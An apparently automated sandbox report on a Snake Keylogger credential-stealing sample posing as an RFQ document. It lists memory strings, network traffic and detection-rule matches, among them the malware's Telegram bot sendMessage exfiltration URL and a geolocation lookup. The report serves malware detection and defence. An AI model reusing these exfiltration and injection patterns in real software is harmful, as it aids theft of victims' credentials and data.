                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20a
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enp
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2

                    System Summary

                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: initial sample | Static PE information: Filename: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080ABA18 CreateProcessAsUserW
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_01727435
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0172B409
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_01727A78
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0172B749
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0172B7A5
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0172B94A
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0172B8E7
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_066576E8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_066576D3
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_06812E08
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_068115C8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_06820E50
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682EBBC
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682DFE8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682CF50
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682F480
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_068252C0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682DFD8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682CF11
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_06826808
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_06826840
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682F471
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A6C79
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A4510
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A11E0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A9B70
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080ABF98
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A5FE0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A1028
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A1038
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A04D2
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A04E0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A1CE0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A44FF
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A5528
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A8968
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A8978
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A1D90
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A0DB0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A0DC0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A11D0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080AA2D8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A0B79
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A0B88
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A07DE
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080A5FD0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080B5540
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080BF8F0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080BF900
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0819EC78
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0819FAA7
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0819EC69
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_06817588
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_06817598
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080B0040
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080BA6DF
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080BA6E0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_08190013
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_08190040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A35362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3A088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A37118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3C146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3C468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A369A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A33E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A329E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_02A3E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06691E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06690B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_066917A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06695028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06699C18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06692968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06699548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06691E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_0669E24A
